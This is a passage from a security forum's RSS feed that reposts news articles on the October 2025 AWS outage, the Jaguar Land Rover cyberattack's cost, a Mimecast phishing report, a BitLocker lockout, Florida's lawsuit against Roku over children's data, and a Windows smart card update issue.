]]></description><guid isPermaLink="false">32023</guid><pubDate>Thu, 23 Oct 2025 01:52:06 +0000</pubDate></item><item><title>The Long Tail of the AWS Outage</title><link>https://nsaneforums.com/news/security-privacy-news/the-long-tail-of-the-aws-outage-r32017/</link><description><![CDATA[<h3>
	Experts say outages like the one that Amazon experienced this week are almost inevitable given the complexity and scale of cloud technology—but the duration serves as a warning.
</h3>

<p>
	<span class="lead-in-text-callout">A sprawling Amazon</span> Web Services <a href="https://www.wired.com/story/what-that-huge-aws-outage-reveals-about-the-internet/" rel="external nofollow">cloud outage</a> that began early Monday morning illustrated the fragile interdependencies of the internet as major communication, financial, health care, education, and government platforms around the world suffered disruptions. As the <a href="https://www.wired.com/story/the-aws-outage-was-a-nightmare-for-college-students/" rel="external nofollow">day wore on</a>, AWS diagnosed and began working to correct the issue, which stemmed from the company's critical US-EAST-1 region based in northern Virginia. But the cascade of impacts took time to fully resolve.
</p>

<p>
	 
</p>

<p>
	Researchers reflecting on the incident particularly highlighted the length of the outage, which started around 3 am ET on Monday, October 20. AWS said in status updates that by 6:01 pm ET on Monday “all AWS services returned to normal operations.” The outage directly stemmed from Amazon's DynamoDB database application programming interfaces and, according to the company, “impacted” 141 other AWS services. Multiple network engineers and infrastructure specialists emphasized to WIRED that errors are understandable and inevitable for so-called “hyperscalers” like AWS, Microsoft Azure, and Google Cloud Platform, given their complexity and sheer size. But they noted, too, that this reality shouldn't simply absolve cloud providers when they have prolonged downtime.
</p>

<div>
	 
</div>

<p>
	“The word <em>hindsight</em> is key. It's easy to find out what went wrong after the fact, but the overall reliability of AWS shows how difficult it is to prevent every failure,” says Ira Winkler, chief information security officer of the reliability and cybersecurity firm CYE. “Ideally, this will be a lesson learned, and Amazon will implement more redundancies that would prevent a disaster like this from happening in the future—or at least prevent them staying down as long as they did.”
</p>

<p>
	 
</p>

<p>
	AWS did not respond to questions from WIRED about the long tail of the recovery for customers. An AWS spokesperson says the company plans to publish one of its “post-event summaries” about the incident.
</p>

<p>
	 
</p>

<p>
	“I don't think this was just a ‘stuff happens’ outage. I would have expected a full remediation much faster,” says Jake Williams, vice president of research and development at Hunter Strategy. “To give them their due, cascading failures aren't something that they get a lot of experience working with because they don't have outages very often. So that's to their credit. But it's really easy to get into the mindset of giving these companies a pass, and we shouldn't forget that they create this situation by actively trying to attract ever more customers to their infrastructure. Clients don't control whether they are overextending themselves or what they may have going on financially.”
</p>

<p>
	 
</p>

<p>
	The incident was caused by a familiar culprit in web outages—“domain name system” resolution issues. DNS is essentially the internet's phonebook mechanism to direct web browsers to the right servers. As a result, DNS issues are a common source of outages, because they can cause requests to fail and keep content from loading.
</p>

<p>
	 
</p>

<p>
	“Cloud computing is a marvel, but the heart of it is a never-ending list of complex services and dependencies that are always one configuration away from failure," says Mark St. John, chief operating officer and cofounder of the systems security startup Neon Cyber.
</p>

<p>
	 
</p>

<p>
	Speaking generally about hyperscalers, St. John echoed Williams' point that in exchange for the mature architecture and secure baseline of cloud platforms, customers cede control of their underlying digital infrastructure and the extent to which their cloud provider is or isn't investing in resilience and contingency planning at a given time. “At a certain scale, operational validation for service providers can't be a casualty of cost-cutting,” St. John says.
</p>

<p>
	 
</p>

<p>
	Thinking specifically about Monday's outage, one senior network architect at a major tech company, who requested anonymity because they are not authorized to speak to the press, also emphasized that the time it took for AWS to diagnose and remediate the issues was notable.
</p>

<p>
	 
</p>

<p>
	“It’s extraordinary that they don’t have more failures,” the source said, “but in this case it was weird that what was basically a core service—DynamoDB and the DNS around that—took so long to detect and get to a root cause.”
</p>

<p>
	 
</p>

<p>
	<a href="https://www.wired.com/story/aws-cloud-outage-long-tail/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Thursday 23 October 2025 at 3:36 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">32017</guid><pubDate>Wed, 22 Oct 2025 17:37:33 +0000</pubDate></item><item><title>Jaguar Land Rover looking at $2.5 billion price tag from crippling cyberattack</title><link>https://nsaneforums.com/news/security-privacy-news/jaguar-land-rover-looking-at-25-billion-price-tag-from-crippling-cyberattack-r32016/</link><description><![CDATA[<h3>
	Incident was likely the most economically damaging cyber event in UK history.
</h3>

<p>
	The cyberattack on Jaguar Land Rover is estimated to have cost the UK at least £1.9 billion in what is likely to be “the most economically damaging cyber event” for the country.
</p>

<p>
	 
</p>

<p>
	The month-long shutdown of internal systems and production at JLR affected over 5,000 British organisations, according to an analysis by Cyber Monitoring Centre, a non-profit organization that ranks the severity of cyber events in the UK.
</p>

<p>
	 
</p>

<p>
	“This incident looks to have been by some distance, the single most financially damaging cyber event ever to hit the UK,” said Ciaran Martin, former head of the National Cyber Security Centre and chair of CMC’s technical committee.
</p>

<p>
	 
</p>

<p>
	JLR, which is owned by India’s Tata Motors, only recently restarted partial production of its vehicles in the UK following a shutdown since the August 31 attack.
</p>

<p>
	 
</p>

<p>
	The severe impact on JLR’s suppliers prompted the UK government to intervene with a £1.5 billion loan guarantee to make it easier for the carmaker to access credit.
</p>

<p>
	 
</p>

<p>
	CMC mainly attributes the financial cost to the fall in vehicle sales and lower profits caused by the production halt, the costs to address the incident, and the impact on its supply chain and other local businesses.
</p>

<p>
	 
</p>

<p>
	Its estimate is also based on the assumption that JLR would not be able to fully restore its production until January and that the attackers did not infiltrate its so-called “operational technology,” which if they had, would take longer to resolve.
</p>

<p>
	 
</p>

<p>
	There has been a spate of ransomware attacks on UK companies and organizations in recent years, including retailers Marks and Spencer and Co-op, in addition to NHS England.
</p>

<p>
	 
</p>

<p>
	The CMC estimated in June that the financial impact of the attacks on the two retailers was between £270 million and £440 million.
</p>

<p>
	 
</p>

<p>
	The investigation into the JLR attack is being led by the National Crime Agency but few details have emerged on who was behind the incident. The CMC estimate did not include assumptions about whether JLR had paid a ransom or not.
</p>

<p>
	 
</p>

<p>
	Martin said companies tended to focus their resources on protecting themselves against data breaches since they have a legal obligation to protect customer data.
</p>

<p>
	 
</p>

<p>
	But cases like JLR underscore the increasing risks of attackers not just stealing data but destroying critical networks supporting a company’s operations, and the high costs associated with such attacks.
</p>

<p>
	 
</p>

<p>
	While state actors have not been behind recent attacks on M&amp;S and other retailers, Martin warned that there was an increasing “geopolitical vulnerability” and risk that hostile nation states could attack UK businesses for non-financial reasons.
</p>

<p>
	 
</p>

<p>
	“It is now clear not just that criminal disruptive attacks are the worst problem in cybersecurity right now, but they’re a playbook to hostile nation states on how to attack us,” Martin said at a separate speech in London on Wednesday. “So cybersecurity has become economic security. And economic security is national security.”
</p>

<p>
	 
</p>

<p>
	Last week, the UK National Cyber Security Centre also warned that state actors continued to pose “a significant threat” to Britain and global cyber security, citing the risks posed by China, Russia, and others.
</p>

<p>
	 
</p>

<p>
	According to an annual review by NCSC, the UK had suffered 204 “nationally significant [cyber] incidents” in the 12 months to August 2025, compared with 89 in the same period a year earlier.
</p>

<p>
	 
</p>

<p>
	The term is used to describe the three most serious types of incidents as defined by UK law enforcement.
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/security/2025/10/jaguar-land-rover-struggling-8-weeks-after-most-expensive-uk-cyberattack/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Thursday 23 October 2025 at 3:35 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">32016</guid><pubDate>Wed, 22 Oct 2025 17:35:54 +0000</pubDate></item><item><title>Are we human or are we security risk?</title><link>https://nsaneforums.com/news/security-privacy-news/are-we-human-or-are-we-security-risk-r32014/</link><description><![CDATA[<p>
	Not quite how The Killers put it, but a new report shows Human workers remain the most consistent point of attack for cybercriminals, with shadow IT and AI-driven social engineering providing attackers with both new tools and new targets.
</p>

<p>
	 
</p>

<p>
	The 2025 Global Threat Intelligence Report from Mimecast reveals key trends, including the rise of smarter, AI-powered phishing and social engineering cyberattacks, and threat groups increasingly using trusted services to evade detection and reach targets. Mimecast’s analysis finds that phishing accounts for 77 percent of all attacks up from 60 percent in 2024 with attackers likely leveraging more AI tools.
</p>

<p>
	 
</p>

<p>
	“We’re seeing a clear evolution in attacker behavior in 2025, headlined by an exponential rise in AI-driven threats,” says Ranjan Singh, Mimecast chief product and technology officer. “Financial platforms, regulatory agencies, and city governments have all been targeted by profit-driven ransomware groups and highly organized, state-sponsored adversaries. Threat actors are doubling down on human-focused attacks and exploiting trusted business services as their primary means of intrusion, making employee awareness and resilient systems more essential than ever.”
</p>

<p>
	 
</p>

<p>
	Generative AI has given threat actors more power to create the perfect lure, impersonating vendors, partners, and employees. They are now able to craft convincing email chains, synthetic voices, and audio messages that can bypass detection tools.
</p>

<p>
	Mimecast research shows a significant increase in social engineering attacks, including schemes like ClickFix, AI-augmented phishing, and business email compromise (BEC). These attacks are becoming increasingly sophisticated, with attackers leveraging automated conversation chains to create the illusion of legitimate communication in phishing emails.
</p>

<p>
	 
</p>

<p>
	Trusted business tools are being exploited too, platforms like Adobe Pay, DocuSign, and Salesforce are being used within attack chains, with virtual meeting room and hosting service DocSend becoming the most abused service in 2025.
</p>

<p>
	 
</p>

<p>
	Certain industries are in the firing lone too with professional education, IT software, telecommunications, real estate, and legal organizations seeing a higher volume of impersonation attacks. These sectors often have direct access to high-value targets, handle sensitive financial transactions and manage confidential client information, making them attractive to attackers.
</p>

<p>
	 
</p>

<p>
	“Cyber defense can no longer be treated solely as a technology issue,” says Mimecast chief information security officer, Leslie Nielsen. “It’s equally about people and organizational resilience. Since last year, cybercriminals have significantly increased their use of trusted services to bypass technical defenses that might otherwise block attacks. Countering these threats requires organizations to adapt by preparing employees to recognize suspicious activity and leveraging tools like AI internally to enhance both business workflows and security operations. As threat actors continue to target the human layer through deception, trust exploitation, and multichannel coordination, building awareness and resilient response capabilities becomes critical.”
</p>

<p>
	 
</p>

<p>
	The <a href="https://www.mimecast.com/resources/ebooks/threat-intelligence-january-june-2025/" rel="external nofollow">full report</a> is available from the Mimecast site.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://betanews.com/2025/10/22/are-we-human-or-are-we-security-risk/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">32014</guid><pubDate>Wed, 22 Oct 2025 14:33:46 +0000</pubDate></item><item><title>Windows 11's BitLocker encryption permanently locks 3TB of a user's backups &#x2014; "Filled my PC with more spyware and viruses than I can count"</title><link>https://nsaneforums.com/news/security-privacy-news/windows-11s-bitlocker-encryption-permanently-locks-3tb-of-a-users-backups-%E2%80%94-filled-my-pc-with-more-spyware-and-viruses-than-i-can-count-r32002/</link><description><![CDATA[<h3>
	A Reddit user runs into some trouble after the security tool reportedly activated itself, locking them out of two storage drives.
</h3>

<p id="c10e5cbd-ec25-400c-af9d-88c64a46d892">
	From as early as <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/tag/windows-vista/page/2" href="https://www.windowscentral.com/tag/windows-vista/page/2" rel="external nofollow">Windows Vista</a>, Microsoft's operating systems started shipping with an important security feature called <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/how-configure-bitlocker-encryption-windows-11" href="https://www.windowscentral.com/how-configure-bitlocker-encryption-windows-11" rel="external nofollow">BitLocker</a>. It's a feature designed to protect sensitive data and information from unauthorized access through encryption.
</p>

<p>
	 
</p>

<p>
	BitLocker is enabled by default in Windows 11 when you first sign in or set up a device with a Microsoft account. Last year, the company made this change while releasing<a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/windows-11/windows-11-version-24h1-changelog-release-date-features-ai-2024-update" href="https://www.windowscentral.com/software-apps/windows-11/windows-11-version-24h1-changelog-release-date-features-ai-2024-update" rel="external nofollow"> Windows 11, version 24H2</a>.
</p>

<p>
	 
</p>

<p aria-hidden="true" id="c10e5cbd-ec25-400c-af9d-88c64a46d892-2">
	The Windows update also made BitLocker accessible to a broad range of devices because it's less demanding in terms of hardware requirements, including Windows 11 Pro and Home. Users no longer need Hardware Security Test Interface (HSTI) or Modern Standby to access the feature.
</p>

<p>
	 
</p>

<p id="50909d0b-8729-42f5-a617-b8b82d2229b8">
	But if the past few months are anything to go by, storage and backing up your data on the cloud are very sensitive topics. Remember when <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/onedrive-user-locked-out-of-30-years-worth-of-photos" href="https://www.windowscentral.com/software-apps/onedrive-user-locked-out-of-30-years-worth-of-photos" rel="external nofollow">a OneDrive user was locked out of "30 years' worth of photos and work"</a> without any support?<strong> </strong>As it happens, a user recently shared an unfortunate incident where they ended up losing access to 3TB worth of games and backups.
</p>

<p>
	 
</p>

<p>
	The user indicated that they'd noticed that their PC was a tad laggy, prompting them to reinstall Windows 11. They further indicated that they'd never enabled BitLocker before since they didn't necessarily need it. However, when they reinstalled Windows 11, two out of the six drives in the gaming PC (built on an AORUS B550 Elite AX v2 motherboard, a Ryzen 7 5700X3D CPU, 64GB of RAM, and a 12GB<a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/tag/nvidia-geforce" href="https://www.windowscentral.com/tag/nvidia-geforce" rel="external nofollow"> GeForce</a> RTX 3060 GPU) were encrypted.
</p>

<p>
	 
</p>

<div class="ipsEmbeddedOther" contenteditable="false">
	<iframe allowfullscreen="" class="ipsEmbed_finishedLoading" data-controller="core.front.core.autosizeiframe" data-embedid="embed1425456068" src="https://nsaneforums.com/index.php?app=core&amp;module=system&amp;controller=embed&amp;url=https://www.reddit.com/r/pcmasterrace/comments/1o9i0or/bitlocker_turned_itself_on_3tb_of_games_and/?embed_host_url=https://www.windowscentral.com/microsoft/bitlocker-encryption-permanently-locks-3tb-of-a-users-backups" style="overflow: hidden; height: 326px;"></iframe>
</div>

<p id="8a5dc549-0575-435d-ae00-e0a42345fc40">
	<em>"Can't access 3TB of data! It's asking for a key but I never set one up,"</em> <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://www.reddit.com/r/pcmasterrace/comments/1o9i0or/bitlocker_turned_itself_on_3tb_of_games_and/?" href="https://www.reddit.com/r/pcmasterrace/comments/1o9i0or/bitlocker_turned_itself_on_3tb_of_games_and/?" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">Toast Soup added on Reddit</a>.<em> "Google only gives results if your boot drive is Bitlocked, not a <span class="ipsEmoji">😧</span> or E: storage drive. I ran some data recovery software but it shows zero files to recover."</em>
</p>

<p>
	 
</p>

<p>
	<em>"Help me Reddit. You're my only hope...,"</em> the user indicated. Perhaps more concerningly, Toast Soup admitted that they dug themselves deeper into the rabbit hole, <em>"using every damn data retrieval program" </em>in a bid to regain access to the encrypted drives with the games and backups. <em>"I went to a lot of sketchy sites and downloaded torrents that I'm sure filled my PC with more spyware and viruses than I can count."</em>
</p>

<p>
	 
</p>

<div id="slice-container-newsletterForm-articleInbodyContent-8tuCq4Vzg4kiWuntfqRMrB">
	<div data-hydrate="true">
		<p>
			Eventually, they decided to perform a clean install of Windows 11, but the BitLocker screen reappeared. Luckily, they had the key for this one. While the user was able to get back to Windows, the storage drives remained encrypted. Ultimately, the user lost hope and pulled the plug on the whole thing.
		</p>

		<figure id="95be3ade-a019-444e-b074-6d3c67a7eccd">
			<blockquote class="QuoteNewsStyle">
				<p>
					I've given up, boys. Can't get into the no matter what I try. Thirty seconds ago I pressed the format button and nuked *years* of data. I have some backups but I think they're too old.
				</p>

				<p>
					 
				</p>

				<p>
					<em><cite>Toast Soup on Reddit.</cite></em>
				</p>
			</blockquote>
		</figure>

		<p id="aee9f719-5156-40eb-9dd8-8a17c84a623e">
			Per <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://www.tomshardware.com/software/windows/bitlocker-reportedly-auto-locks-users-backup-drives-causing-loss-of-3tb-of-valuable-data-windows-automatic-disk-encryption-can-permanently-lock-your-drives" href="https://www.tomshardware.com/software/windows/bitlocker-reportedly-auto-locks-users-backup-drives-causing-loss-of-3tb-of-valuable-data-windows-automatic-disk-encryption-can-permanently-lock-your-drives" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">Tom's Hardware's</a> testing, BitLocker is also a resource-intensive security tool that can slow down random read/write speeds of the affected SSDs by up to 45%. The outlet indicated that this was because the tool forces your processor to encrypt and decrypt every single thing.
		</p>

		<p>
			 
		</p>

		<p>
			Based on this premise, it is highly likely that Toast Soup had BitLocker enabled by default in Windows 11, especially after Microsoft made the change when releasing Windows 11, version 24H2. The laggy device is a major telltale sign.
		</p>

		<p>
			 
		</p>

		<p>
			However, it's still obviously unfortunate that the user couldn't access the key to unlock the encrypted drives. This is despite numerous attempts, including trying to recover the key from their Microsoft account. Be careful with your backups.
		</p>

		<p>
			 
		</p>

		<p>
			<a href="https://www.windowscentral.com/microsoft/bitlocker-encryption-permanently-locks-3tb-of-a-users-backups" rel="external nofollow">Source</a>
		</p>

		<hr class="ipsHr">
		<p>
			<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
		</p>

		<p>
			<span style="font-size:12px;"><em>Posted Wednesday 22 October 2025 at 4:38 am AEST (my time).</em></span>
		</p>

		<p>
			<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
		</p>

		<p>
			<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
		</p>
	</div>
</div>
]]></description><guid isPermaLink="false">32002</guid><pubDate>Tue, 21 Oct 2025 18:40:55 +0000</pubDate></item><item><title>Amazon&#x2019;s DNS problem knocked out half the web, likely costing billions</title><link>https://nsaneforums.com/news/security-privacy-news/amazon%E2%80%99s-dns-problem-knocked-out-half-the-web-likely-costing-billions-r32001/</link><description><![CDATA[<h3>
	Amazon’s outage is over. But backlash over billions in losses has just started.
</h3>

<p>
	On Monday afternoon, <a href="https://health.aws.amazon.com/health/status" rel="external nofollow">Amazon confirmed</a> that an outage affecting Amazon Web Services’ cloud hosting, which had impacted millions across the Internet, had been resolved.
</p>

<p>
	 
</p>

<p>
	Considered the worst outage since <a href="https://arstechnica.com/information-technology/2024/07/major-outages-at-crowdstrike-microsoft-leave-the-world-with-bsods-and-confusion/" rel="external nofollow">last year’s CrowdStrike chaos</a>, Amazon’s outage caused “global turmoil,” Reuters <a href="https://www.reuters.com/business/retail-consumer/amazons-cloud-unit-reports-outage-several-websites-down-2025-10-20/" rel="external nofollow">reported</a>. AWS is the world’s largest cloud provider and, therefore, the “backbone of much of the Internet,” ZDNet <a href="https://www.zdnet.com/home-and-office/networking/the-massive-aws-outage-that-broke-half-the-internet-is-finally-over-heres-what-happened/" rel="external nofollow">noted</a>. Ultimately, more than 28 AWS services were disrupted, causing perhaps billions in damages, one analyst <a href="https://www.cnn.com/business/live-news/amazon-tech-outage-10-20-25-intl" rel="external nofollow">estimated</a> for CNN.
</p>

<p>
	 
</p>

<p>
	Popular apps like Snapchat, Signal, and Reddit went dark. Flights got delayed. Banks and financial services went down. Massive games like <em>Fortnite</em> could not be accessed. Some of Amazon’s own services were hit, too, including its e-commerce platform, Alexa, and Prime Video. Ultimately, millions of businesses simply stopped operating, unable to log employees into their systems or accept payments for their goods.
</p>

<p>
	 
</p>

<p>
	“The incident highlights the complexity and fragility of the Internet, as well as how much every aspect of our work depends on the Internet to work,” Mehdi Daoudi, the CEO of an Internet performance monitoring firm called Catchpoint, told CNN. “The financial impact of this outage will easily reach into the hundreds of billions due to loss in productivity for millions of workers that cannot do their job, plus business operations that are stopped or delayed—from airlines to factories.”
</p>

<p>
	 
</p>

<p>
	Amazon’s problems originated at a US site that is its “oldest and largest for web services” and often “the default region for many AWS services,” Reuters <a href="https://www.reuters.com/business/retail-consumer/amazons-cloud-unit-reports-outage-several-websites-down-2025-10-20/" rel="external nofollow">noted</a>. The same site has experienced two outages before in 2020 and 2021, but while the tech giant had confirmed that those prior issues had been “fully mitigated,” apparently the fixes did not ensure stability into 2025.
</p>

<p>
	 
</p>

<p>
	ZDNet noted that Amazon’s first sign of the outage was “increased error rates and latency across numerous key services” tied to its cloud database technology. Although “engineers later identified a Domain Name System (DNS) resolution problem” as the root of these issues and quickly fixed it, “other AWS services began to fail in its wake, leaving the platform still impaired” as more than two dozen AWS services shut down.
</p>

<p>
	 
</p>

<p>
	At the peak of the outage on Monday, Down Detector tracked more than 8 million reports globally from users panicked by the outage, ZDNet reported.
</p>

<p>
	 
</p>

<p>
	Ken Birman, a computer science professor at Cornell University, told Reuters that “software developers need to build better fault tolerance,” suggesting Amazon could have done more to prevent the latest outage.
</p>

<p>
	 
</p>

<p>
	“When people cut costs and cut corners to try to get an application up, and then forget that they skipped that last step and didn’t really protect against an outage, those companies are the ones who really ought to be scrutinized later,” Birman told Reuters.
</p>

<p>
	 
</p>

<p>
	For Amazon, the backlash risks hitting its bottom line hard if too many customers pivot to other cloud technology providers. Financial services firms, which may be the most risk-averse of Amazon’s customers, think the solution might be a “multi-cloud” strategy, “distributing critical workloads across two or more major providers, such as AWS, Microsoft Azure, and Google Cloud,” Forbes <a href="https://www.forbes.com/sites/christerholloman/2025/10/20/aws-outage-billions-lost-multi-cloud-is-wall-streets-solution/" rel="external nofollow">reported</a>.
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/tech-policy/2025/10/amazons-dns-problem-knocked-out-half-the-web-likely-costing-billions/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Wednesday 22 October 2025 at 4:37 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">32001</guid><pubDate>Tue, 21 Oct 2025 18:38:08 +0000</pubDate></item><item><title>Roku accused of selling children&#x2019;s data to advertisers and brokers</title><link>https://nsaneforums.com/news/security-privacy-news/roku-accused-of-selling-children%E2%80%99s-data-to-advertisers-and-brokers-r31990/</link><description><![CDATA[
	<div>
		<em><span>October 16, 2025</span> </em><span><em> by</em> <span><a href="https://www.malwarebytes.com/blog/authors/dbradbury" rel="external nofollow">Danny Bradbury</a></span></span>
	</div>


<div>
	<p>
		 
	</p>

	<p>
		The state of Florida has accused Roku, which powers many smart TVs and streaming devices, of selling children’s data to third parties without their consent.
	</p>

	<p>
		 
	</p>

	<p>
		According to the Florida Attorney General James Uthmeier, Roku collected viewing habits, voice recordings, and precise geolocation from kids without approval from parents.
	</p>

	<p>
		 
	</p>

	<p>
		Roku, which reaches around 145 million people across half of US households, allegedly gathered children’s data despite clear signals that the viewers were minors, the AG said.
	</p>

	<p>
		 
	</p>

	<p>
		After collecting the data, Roku made it available to advertisers and sold it to data brokers, including Kochava, according to the Florida government.
	</p>

	<p>
		 
	</p>

	<p>
		Kochava is already facing its own lawsuit from the Federal Trade Commission, which claims the company sells highly sensitive consumer information.
	</p>

	<p>
		 
	</p>

	<p>
		Uthmeier’s office said in a <a href="https://www.myfloridalegal.com/newsrelease/attorney-general-james-uthmeiers-office-parental-rights-files-enforcement-action#main-content" rel="external nofollow">news release</a>:
	</p>

	<blockquote style="font-size:22px;line-height:30px;">
		<p>
			“The State contends that Roku’s practices violated Florida’s privacy and consumer-protection laws by failing to obtain parental consent before selling or processing children’s data and by misrepresenting the effectiveness of its privacy controls and opt-out tools.”
		</p>
	</blockquote>

	<p>
		In the complaint filed in court, the AG’s office accused Roku of turning a blind eye to the collection of minors’ data.
	</p>

	<blockquote style="font-size:22px;line-height:30px;">
		<p>
			“Roku knows that some of its users are children but has consciously decided not to implement industry-standard user profiles to identify which of its users are children.”
		</p>
	</blockquote>

	<p>
		The lawsuit claims Roku ignored obvious indicators, such as when users installed its Kids Screensaver or Kids Theme Pack products.
	</p>

	<p>
		 
	</p>

	<p>
		Uthmeier’s office also said that although Roku sells deidentified data to brokers (that is, data that has identifying information removed), it’s still possible for brokers like Kochava to reidentify users.
	</p>

	<p>
		 
	</p>

	<p>
		Brokers often have troves of information of their own, such as device IDs linked to potentially identifying information, which can allow them to match records to specific people.
	</p>

	<p>
		 
	</p>

	<p>
		Florida has filed the lawsuit under the Florida Digital Bill of Rights (FDBR), which came into effect on July 1, 2024.
	</p>

	<p>
		 
	</p>

	<p>
		The law protects Florida residents’ privacy, including children’s data rights, and gives parents the ability to opt out of data processing for their kids.
	</p>

	<p>
		 
	</p>

	<p>
		The penalty for violating the FDBR is up to $50,000 per violation, but that triples for violations where the consumer involved is a known child. That includes cases of “willful disregard of a child’s age.”
	</p>

	<p>
		 
	</p>

	<p>
		This isn’t the only case that Roku must navigate in court.
	</p>

	<p>
		 
	</p>

	<p>
		In April, Michigan Attorney General Dana Nessel also <a href="https://www.regulatoryoversight.com/2025/08/streaming-under-scrutiny-rokus-response-to-michigan-ags-allegations-of-coppa-and-other-privacy-law-violations/" rel="external nofollow">sued Roku</a> for similar violations, accusing it of violating laws including the Children’s Online Privacy Protection Act (COPPA), along with federal and state privacy laws. Roku is fighting the suit.
	</p>

	<p>
		 
	</p>

	<p>
		Smart TV advertising is big business in the US.
	</p>

	<p>
		 
	</p>

	<p>
		So much, in fact, that Roku appears to sell its devices at a loss to power its platform revenues, which include not just subscriptions, but advertising.
	</p>

	<p>
		 
	</p>

	<p>
		In fiscal 2024, it <a href="https://image.roku.com/c3VwcG9ydC1B/4Q24-Shareholder-Letter.pdf" rel="external nofollow">lost</a> $80.3 million on device sales, up from $43.9 million in device-based losses the prior year. Yet it made $1.9 billion profit from its platform business, up from $1.567 billion in 2023.
	</p>

	<p>
		 
	</p>

	<p>
		According to <a href="https://themarkup.org/privacy/2023/12/12/your-smart-tv-knows-what-youre-watching" rel="external nofollow">reports</a>, Roku’s Automatic Content Recognition (ARC) technology <a href="https://docs.roku.com/published/acrservicepolicy/en/ca" rel="external nofollow">captures</a> thousands of images each hour from smart TVs. These can be used to help track viewing activity.
	</p>

	<p>
		 
	</p>

	<p>
		In January, Roku launched its Data Cloud, a service that allows its partners to use the company’s proprietary TV data. It was the latest step in a multi-year strategy to build out its data offering.
	</p>

	<p>
		 
	</p>

	<p>
		In 2022, it <a href="https://www.adexchanger.com/digital-tv/not-to-be-left-out-roku-announces-its-clean-room-service-in-time-for-the-upfronts/" rel="external nofollow">launched</a> a ‘clean room’ product that allowed other companies to combine their data with Roku’s own, conducting queries about viewer behavior while preserving privacy (this is how companies access its Data Cloud).
	</p>

	<p>
		 
	</p>

	<p>
		Then, in 2024, it launched Roku Exchange—an advertising hub for partners.
	</p>

	<p>
		 
	</p>

	<p>
		<a href="https://www.malwarebytes.com/blog/news/2025/10/roku-accused-of-selling-childrens-data-to-advertisers-and-brokers?utm_source=iterable&amp;utm_medium=email&amp;utm_campaign=b2c_pro_oth_20251020_octoberweeklynewsletter_v3_176069215103&amp;utm_content=Roku_logo" rel="external nofollow">Source</a>
	</p>
</div>
]]></description><guid isPermaLink="false">31990</guid><pubDate>Mon, 20 Oct 2025 18:16:40 +0000</pubDate></item><item><title>Microsoft warns of Windows smart card auth issues after October updates</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-warns-of-windows-smart-card-auth-issues-after-october-updates-r31985/</link><description><![CDATA[<p>
	Microsoft says the October 2025 Windows security updates are causing smart card authentication and certificate issues due to a change designed to strengthen the Windows Cryptographic Services.
</p>

<p>
	 
</p>

<p>
	This known issue impacts all Windows 10, Windows 11, and Windows Server releases, including the latest versions designated for broad deployment.
</p>

<p>
	 
</p>

<p>
	Affected users may observe various symptoms, from the inability to sign documents and failures in applications that use certificate-based authentication to smart cards not being recognized as CSP providers (Cryptographic Service Provider) in 32-bit apps.
</p>

<p>
	 
</p>

<p>
	They can also see "invalid provider type specified" and "CryptAcquireCertificatePrivateKey error." error messages.
</p>

<p>
	 
</p>

<p>
	"This issue is linked to a recent Windows security improvement to use KSP (Key Storage Provider) instead of CSP (Cryptographic Service Provider) for RSA-based smart card certificates to improve cryptography," <a href="https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-25h2#3697msgdesc" rel="external nofollow" target="_blank">Microsoft said</a>.
</p>

<p>
	 
</p>

<p>
	"You can detect if your smart card will be affected by this issue if you observe the presence of Event ID 624 in the System event logs for the Smart Card Service prior to installing the October 2025 Windows security update."
</p>

<p>
	 
</p>

<p>
	As the company explained, this known issues occurs because this month's security updates are automatically enabling by default a security fix designed to address a security feature bypass vulnerability (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30098" rel="external nofollow" target="_blank">CVE-2024-30098</a>) in the Windows Cryptographic Services, built-in Windows service that handles security-related and cryptographic operations.
</p>

<p>
	 
</p>

<p>
